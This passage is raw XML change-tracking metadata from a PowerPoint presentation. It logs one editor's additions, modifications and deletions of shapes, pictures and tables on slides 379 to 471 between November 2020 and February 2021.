            <ac:spMk id="6" creationId="{1AA06D5F-8863-4270-AA3F-66EF92F296F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:29:06.259" v="8760" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="7" creationId="{9E2E3438-C9F3-472C-B2DA-2C820B89B0C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:15:52.108" v="8713" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:picMk id="4" creationId="{92565BD4-9D9A-4A9C-8042-784FC3CE0078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35:39.311" v="8798" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2826770376" sldId="451"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:34:34.532" v="8792"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:spMk id="2" creationId="{6645E2D7-99B3-4D9C-98CD-216F1C581D4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:34:01.510" v="8765" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:spMk id="3" creationId="{FCD3317A-6E90-4478-8908-28106AFE985A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:35:39.311" v="8798" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:spMk id="6" creationId="{B971F1BB-67AE-4C21-BF70-417619960348}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:35:26.903" v="8796" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:picMk id="4" creationId="{8D80FE88-4B62-4D15-958C-44198343BCAB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:43:35.407" v="9086" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="605110631" sldId="452"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:37:25.277" v="8800"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="605110631" sldId="452"/>
            <ac:spMk id="2" creationId="{1F07EEF5-79A7-4004-AE05-34F7CB673B02}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:43:19.974" v="9084" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="605110631" sldId="452"/>
            <ac:spMk id="3" creationId="{B6FE67B4-8696-45FB-8B3A-8286C3499CEE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:43:35.407" v="9086" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="605110631" sldId="452"/>
            <ac:spMk id="4" creationId="{FCF26032-2A1B-44DF-BABC-8C8FC369C64A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:46.388" v="9096" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="629962386" sldId="453"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:46.388" v="9096" actId="20577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5:50.848" v="9098" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1291906013" sldId="454"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:50.848" v="9098" actId="20577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0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:01.817" v="9100" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2462243918" sldId="455"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:01.817" v="9100" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2462243918" sldId="455"/>
            <ac:picMk id="4" creationId="{D3F49674-7759-4D2E-B296-D829C1E4C6B6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:05.909" v="9102" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2361623568" sldId="456"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:05.909" v="9102" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2361623568" sldId="456"/>
            <ac:picMk id="3" creationId="{01A8D313-C60B-4143-8B57-C5D10D2B4679}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:15.981" v="9106" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2011088463" sldId="457"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:15.981" v="9106" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2011088463" sldId="45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1T21:06:22.362" v="9108" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2124952347" sldId="458"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:22.362" v="9108" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2124952347" sldId="458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10:08:37.396" v="9169"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="557494082" sldId="459"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:07:37.163" v="9139" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="557494082" sldId="459"/>
            <ac:picMk id="2" creationId="{612AAC04-D3A1-4B6B-BE94-DF6C916F5689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3" creationId="{3514F424-367F-484C-99EE-A10433F1A6B0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:08:33.470" v="9168" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="557494082" sldId="459"/>
            <ac:picMk id="4" creationId="{0D646922-3257-494B-863A-AE9FD5C878D6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1-22T10:11:30.566" v="9243"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3613343358" sldId="460"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:11:14.721" v="9241" actId="1035"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3613343358" sldId="460"/>
            <ac:picMk id="2" creationId="{A11B61FC-BD17-4CD2-B868-F49192E53028}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:11:19.739" v="9242" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3613343358" sldId="460"/>
            <ac:picMk id="3" creationId="{8BD22156-64F0-4AD6-9F66-925F1CB60001}"/>
          </ac:picMkLst>
        </pc:pic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522130509" sldId="461"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:13:17.884" v="9381" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="522130509" sldId="461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0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:33:27.321" v="9930" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3480610823" sldId="462"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:15:35.900" v="9559" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3480610823" sldId="462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3:11.750" v="11277" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2930044362" sldId="463"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:57:15.280" v="11256" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2930044362" sldId="463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7.879" v="11274" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="332447904" sldId="464"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:32:52.515" v="9916" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="332447904" sldId="464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0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-12-06T11:22:51.751" v="11272" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1956652012" sldId="465"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:33:06.908" v="9924" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1956652012" sldId="46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0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:33:21.707" v="9929" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3787008638" sldId="466"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:33:21.707" v="9929" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3787008638" sldId="466"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:37:08.571" v="11004" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="986747498" sldId="467"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:31:06.065" v="10760" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="2" creationId="{439F6EC3-8D33-457B-9D19-B33A0C69F604}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:36:23.201" v="10997" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="3" creationId="{3A80017C-65A0-44F9-AC81-9872FD2035FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:33:08.994" v="10934"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="4" creationId="{03E3BEDF-701B-4635-B65E-373D1B306D3D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:37:08.571" v="11004" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="6" creationId="{C3C90AF7-4C08-4DCF-B108-0D2503F28380}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-12-06T11:23:07.114" v="11276" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1775983338" sldId="468"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:57:11.616" v="11252" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1775983338" sldId="468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  <pc:docChgLst>
    <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:32.496" v="2476"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:28:48.836" v="2448"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2692560093" sldId="379"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-09T21:07:02.629" v="308"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1173228883" sldId="380"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-09T21:05:44.694" v="260" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173228883" sldId="380"/>
            <ac:spMk id="3" creationId="{CFEA4607-FE9F-487B-A05E-5E3CDEAACDDA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:32.496" v="2476"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2648658250" sldId="438"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:32.496" v="2476"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438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ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:37:18.111" v="2431" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="480636073" sldId="444"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:28.854" v="2475"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="629962386" sldId="453"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:28.854" v="2475"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="629962386" sldId="45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44:25.199" v="2474"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1291906013" sldId="454"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:25.199" v="2474"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1291906013" sldId="454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4:21.717" v="2473"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2462243918" sldId="455"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:21.717" v="2473"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2462243918" sldId="455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ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:43:20.887" v="2468" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2361623568" sldId="456"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:43:20.887" v="2468" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2361623568" sldId="456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ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:28:01.272" v="2447" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="986747498" sldId="467"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:28:01.272" v="2447" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="3" creationId="{3A80017C-65A0-44F9-AC81-9872FD2035FF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme modAnim chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:32:07.640" v="2420" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2614776957" sldId="469"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T15:48:44.932" v="333" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2614776957" sldId="469"/>
            <ac:spMk id="2" creationId="{997D890A-320D-4936-B973-97896F4BDA30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:32:07.640" v="2420" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2614776957" sldId="469"/>
            <ac:spMk id="3" creationId="{476755E0-FD81-4665-ADAB-6987A644BD1A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:12:03.141" v="1131" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3126579985" sldId="470"/>
        </pc:sldMkLst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2" creationId="{50CB1D5B-B229-4C2C-86E6-FAA790E102FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:00:19.651" v="1066" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3126579985" sldId="470"/>
            <ac:spMk id="3" creationId="{74A7B42B-9821-4522-8D39-390FA20ACCB0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:04:24.682" v="1077" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3126579985" sldId="470"/>
            <ac:spMk id="4" creationId="{135C7FEA-76AA-478B-AF2A-83A5FB240155}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:32:25.435" v="2424"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="990511004" sldId="471"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:03:47.713" v="1076" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
            <ac:spMk id="2" creationId="{997D890A-320D-4936-B973-97896F4BDA30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:04:33.233" v="1078" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="990511004" sldId="471"/>
